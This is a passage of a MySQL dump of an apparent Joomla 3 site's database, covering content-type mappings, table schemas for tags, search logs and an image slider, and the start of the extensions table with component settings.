{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(11,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(12,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(13,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(14,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(15,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(16,'BreezingForms','com_breezingforms.form','','','','BreezingformsHelperRoute::getFormRoute',NULL),(17,'BreezingForms','com_breezingforms.form','','','','BreezingformsHelperRoute::getFormRoute',NULL);
/*!40000 ALTER TABLE `vzx9b_content_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_contentitem_tag_map`
--
DROP TABLE IF EXISTS `vzx9b_contentitem_tag_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_contentitem_tag_map` (
`type_alias` varchar(255) NOT NULL DEFAULT '',
`core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table',
`content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table',
`tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table',
`tag_date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Date of most recent save for this tag-item',
`type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table',
UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
KEY `idx_tag_type` (`tag_id`,`type_id`),
KEY `idx_date_id` (`tag_date`,`tag_id`),
KEY `idx_core_content_id` (`core_content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Maps items from content tables to tags';
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_contentitem_tag_map`
--
LOCK TABLES `vzx9b_contentitem_tag_map` WRITE;
/*!40000 ALTER TABLE `vzx9b_contentitem_tag_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_contentitem_tag_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_core_log_searches`
--
DROP TABLE IF EXISTS `vzx9b_core_log_searches`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_core_log_searches` (
`search_term` varchar(128) NOT NULL DEFAULT '',
`hits` int(10) unsigned NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_core_log_searches`
--
LOCK TABLES `vzx9b_core_log_searches` WRITE;
/*!40000 ALTER TABLE `vzx9b_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_djimageslider`
--
DROP TABLE IF EXISTS `vzx9b_djimageslider`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_djimageslider` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL,
`alias` varchar(255) NOT NULL DEFAULT '',
`image` varchar(255) NOT NULL,
`description` text DEFAULT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `catid` (`catid`,`published`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_djimageslider`
--
LOCK TABLES `vzx9b_djimageslider` WRITE;
/*!40000 ALTER TABLE `vzx9b_djimageslider` DISABLE KEYS */;
INSERT INTO `vzx9b_djimageslider` VALUES (1,85,'Providing simple solutions for serious matters.','providing-simple-solutions-for-serious-matters','images/smith-and-smith-sliders-01.jpg','',1,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'{\"link_type\":\"\",\"link_menu\":\"437\",\"link_url\":\"\",\"link_article\":\"\",\"link_target\":\"\",\"link_rel\":\"\"}');
/*!40000 ALTER TABLE `vzx9b_djimageslider` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_extensions`
--
DROP TABLE IF EXISTS `vzx9b_extensions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_extensions` (
`extension_id` int(11) NOT NULL AUTO_INCREMENT,
`package_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Parent package ID for extensions installed as a package.',
`name` varchar(100) NOT NULL,
`type` varchar(20) NOT NULL,
`element` varchar(100) NOT NULL,
`folder` varchar(100) NOT NULL,
`client_id` tinyint(3) NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 1,
`protected` tinyint(3) NOT NULL DEFAULT 0,
`manifest_cache` mediumtext NOT NULL,
`params` mediumtext NOT NULL,
`custom_data` mediumtext NOT NULL,
`system_data` mediumtext NOT NULL,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) DEFAULT 0,
`state` int(11) DEFAULT 0,
PRIMARY KEY (`extension_id`),
KEY `element_clientid` (`element`,`client_id`),
KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10108 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_extensions`
--
LOCK TABLES `vzx9b_extensions` WRITE;
/*!40000 ALTER TABLE `vzx9b_extensions` DISABLE KEYS */;
INSERT INTO `vzx9b_extensions` VALUES (1,0,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,0,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,0,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,0,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\",\"save_history\":\"1\",\"history_limit\":10}','','',0,'0000-00-00 00:00:00',0,0),(5,0,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,0,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,0,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,0,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"show_contact_category\":\"hide\",\"save_history\":\"1\",\"history_limit\":10,\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,0,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,0,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(11,0,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,0,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,0,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}','','',0,'0000-00-00 00:00:00',0,0),(14,0,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(15,0,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,0,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(17,0,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"newsfeed_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_character_count\":\"0\",\"feed_display_order\":\"des\",\"float_first\":\"right\",\"float_second\":\"right\",\"show_tags\":\"1\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_items\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_items_cat\":\"1\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,0,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(19,0,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,0,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(22,0,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"1\",\"link_author\":\"1\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"1\",\"show_vote\":\"1\",\"show_readmore\":\"1\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_tags\":\"1\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"1\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"1\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"0\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"0\",\"show_cat_num_articles\":\"0\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_sub